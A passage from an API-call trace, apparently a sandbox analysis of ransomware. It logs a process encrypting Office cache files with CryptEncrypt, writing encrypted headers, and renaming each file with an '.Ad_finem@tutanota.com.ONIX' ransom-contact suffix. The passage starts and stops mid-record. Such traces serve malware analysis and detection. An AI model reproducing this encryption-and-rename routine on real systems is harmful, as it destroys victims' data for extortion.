Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 90 [0126.521] GetProcessHeap () returned 0x410000 [0126.521] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x124) returned 0x449cf0 [0126.521] lstrcpyW (in: lpString1=0x449cf0, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" [0126.521] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0126.521] GetFileSizeEx (in: hFile=0x518, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2517504) returned 1 [0126.521] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x266a00 [0126.521] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0126.521] GetProcessHeap () returned 0x410000 [0126.521] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0126.521] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0126.521] WriteFile (in: hFile=0x518, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0126.525] WriteFile (in: hFile=0x518, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0126.526] WriteFile (in: hFile=0x518, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0126.527] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x266a00) returned 0x3680020 [0126.528] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x266a00) returned 0x38f0020 [0126.528] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.528] ReadFile (in: hFile=0x518, lpBuffer=0x3680020, nNumberOfBytesToRead=0x266a00, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x266a00, lpOverlapped=0x0) returned 1 [0126.694] UnlockFile (hFile=0x518, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x266a00, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0126.694] CloseHandle (hObject=0x518) returned 1 [0126.694] GetProcessHeap () returned 0x410000 [0126.694] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0126.694] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0126.700] GetProcessHeap () returned 0x410000 [0126.700] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449cf0 | out: hHeap=0x410000) returned 1 [0126.701] FindNextFileW (in: hFindFile=0x4e0d80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessMUI.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0126.701] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x518 [0126.701] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0126.702] LockFile (hFile=0x518, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x545, nNumberOfBytesToLockHigh=0x0) returned 1 [0126.702] SetFilePointerEx (in: hFile=0x518, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.702] ReadFile (in: hFile=0x518, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0126.706] SetFilePointerEx (in: hFile=0x518, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.706] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.707] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0126.707] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0126.707] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", dwFileAttributes=0x80) returned 1 [0126.707] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 90 [0126.707] GetProcessHeap () returned 0x410000 [0126.707] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x124) returned 0x449cf0 [0126.707] lstrcpyW (in: lpString1=0x449cf0, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" [0126.707] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0126.707] GetFileSizeEx (in: hFile=0x518, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1349) returned 1 [0126.707] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x545 [0126.707] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0126.707] GetProcessHeap () returned 0x410000 [0126.707] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0126.707] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0126.707] WriteFile (in: hFile=0x518, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0126.709] WriteFile (in: hFile=0x518, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0126.710] WriteFile (in: hFile=0x518, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0126.711] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x545) returned 0x4e1b68 [0126.711] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x545) returned 0x4e20b8 [0126.711] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.711] ReadFile (in: hFile=0x518, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x545, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x545, lpOverlapped=0x0) returned 1 [0126.711] SetFilePointer (in: hFile=0x518, lDistanceToMove=-1349, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.711] WriteFile (in: hFile=0x518, lpBuffer=0x4e20b8*, nNumberOfBytesToWrite=0x545, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e20b8*, lpNumberOfBytesWritten=0x367f44c*=0x545, lpOverlapped=0x0) returned 1 [0126.712] UnlockFile (hFile=0x518, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x545, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0126.712] CloseHandle (hObject=0x518) returned 1 [0126.714] GetProcessHeap () returned 0x410000 [0126.714] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0126.714] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0126.716] GetProcessHeap () returned 0x410000 [0126.716] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449cf0 | out: hHeap=0x410000) returned 1 [0126.717] FindNextFileW (in: hFindFile=0x4e0d80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3216e900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3216e900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa64a430, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1ab7e94, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccLR.cab", cAlternateFileName="")) returned 1 [0126.717] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x518 [0126.717] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0126.718] LockFile (hFile=0x518, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1ab7e94, nNumberOfBytesToLockHigh=0x0) returned 1 [0126.718] SetFilePointerEx (in: hFile=0x518, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.718] ReadFile (in: hFile=0x518, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0126.721] SetFilePointerEx (in: hFile=0x518, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.721] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.722] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0126.722] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0126.722] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", dwFileAttributes=0x80) returned 1 [0126.722] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 86 [0126.722] GetProcessHeap () returned 0x410000 [0126.722] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x449cf0 [0126.722] lstrcpyW (in: lpString1=0x449cf0, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" [0126.722] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0126.722] GetFileSizeEx (in: hFile=0x518, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=28016276) returned 1 [0126.722] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1ab7e94 [0126.722] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0126.722] GetProcessHeap () returned 0x410000 [0126.722] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0126.722] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0126.722] WriteFile (in: hFile=0x518, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0126.724] WriteFile (in: hFile=0x518, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0126.725] WriteFile (in: hFile=0x518, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0126.727] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1ab7e94) returned 0x3680020 [0126.728] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1ab7e94) returned 0x5140020 [0126.728] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.728] ReadFile (in: hFile=0x518, lpBuffer=0x3680020, nNumberOfBytesToRead=0x1ab7e94, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x1ab7e94, lpOverlapped=0x0) returned 1 [0128.172] SetFilePointer (in: hFile=0x518, lDistanceToMove=-28016276, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.172] WriteFile (in: hFile=0x518, lpBuffer=0x5140020*, nNumberOfBytesToWrite=0x1ab7e94, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x5140020*, lpNumberOfBytesWritten=0x367f44c*=0x1ab7e94, lpOverlapped=0x0) returned 1 [0128.809] UnlockFile (hFile=0x518, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1ab7e94, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0128.810] CloseHandle (hObject=0x518) returned 1 [0128.815] GetProcessHeap () returned 0x410000 [0128.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0128.815] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0128.818] GetProcessHeap () returned 0x410000 [0128.818] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449cf0 | out: hHeap=0x410000) returned 1 [0128.818] FindNextFileW (in: hFindFile=0x4e0d80, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0128.818] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x518 [0128.819] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0128.819] LockFile (hFile=0x518, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x91975, nNumberOfBytesToLockHigh=0x0) returned 1 [0128.819] SetFilePointerEx (in: hFile=0x518, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.819] ReadFile (in: hFile=0x518, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0128.822] SetFilePointerEx (in: hFile=0x518, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.822] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.822] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0128.822] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0128.822] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", dwFileAttributes=0x80) returned 1 [0128.823] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 89 [0128.823] GetProcessHeap () returned 0x410000 [0128.823] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x122) returned 0x449cf0 [0128.823] lstrcpyW (in: lpString1=0x449cf0, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" [0128.823] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0128.823] GetFileSizeEx (in: hFile=0x518, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=596341) returned 1 [0128.823] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x91975 [0128.823] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0128.823] GetProcessHeap () returned 0x410000 [0128.823] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0128.823] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0128.823] WriteFile (in: hFile=0x518, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0128.829] WriteFile (in: hFile=0x518, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0128.830] WriteFile (in: hFile=0x518, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0128.831] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x91975) returned 0x2680020 [0128.832] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x91975) returned 0x2b30020 [0128.832] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.832] ReadFile (in: hFile=0x518, lpBuffer=0x2680020, nNumberOfBytesToRead=0x91975, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2680020*, lpNumberOfBytesRead=0x367f44c*=0x91975, lpOverlapped=0x0) returned 1 [0128.864] UnlockFile (hFile=0x518, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x91975, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0128.864] CloseHandle (hObject=0x518) returned 1 [0128.864] GetProcessHeap () returned 0x410000 [0128.864] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0128.864] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all 